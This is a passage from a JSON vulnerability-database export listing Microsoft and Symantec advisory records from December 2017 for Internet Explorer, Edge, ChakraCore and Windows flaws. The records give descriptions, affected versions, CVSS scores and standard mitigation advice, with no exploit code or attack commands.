These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11907"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11907", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11907", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to an information disclosure vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. 
Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-11919 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11919"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102093", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102093", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:05:33", "bulletinFamily": "software", "cvelist": ["CVE-2017-11927"], "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. 
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102095", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102095", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Windows CVE-2017-11927 Information Disclosure Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:05:33", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. 
Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Windows RPC CVE-2017-11885 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102055", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102055", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-11887"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to an information-disclosure vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. 
Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102063", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102063", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11887 Information Disclosure Vulnerability", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-11T20:41:50", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge CVE-2017-11888 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11888"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102065", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102065", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:05:33", "bulletinFamily": "software", "cvelist": ["CVE-2017-11899"], "description": "### Description\n\nMicrosoft Windows is prone to a remote security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. 
This may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits. \n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nUsers should be cautious when installing and running applications from untrusted sources. \n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102077", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102077", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Windows Device Guard CVE-2017-11899 Remote Security Bypass Vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-12T16:12:12", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11918 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11918"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102089", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102089", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-11T20:41:53", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11893 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11893"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102081", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102081", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:41:49", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11889 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11889"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102080", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102080", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Internet Explorer 9, 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Scripting Engine CVE-2017-11906 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102078", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102078", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 11 and Edge are vulnerable.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-11895 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11895"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102054", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102054", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. 
Internet Explorer 9, 10, 11 and Edge are vulnerable.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-11894 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11894"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102053", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102053", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11886 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11886"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102062", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102062", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T12:08:08", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11905 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11905"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102050", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102050", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T06:25:09", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11910 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11910"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102086", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102086", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T14:30:46", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
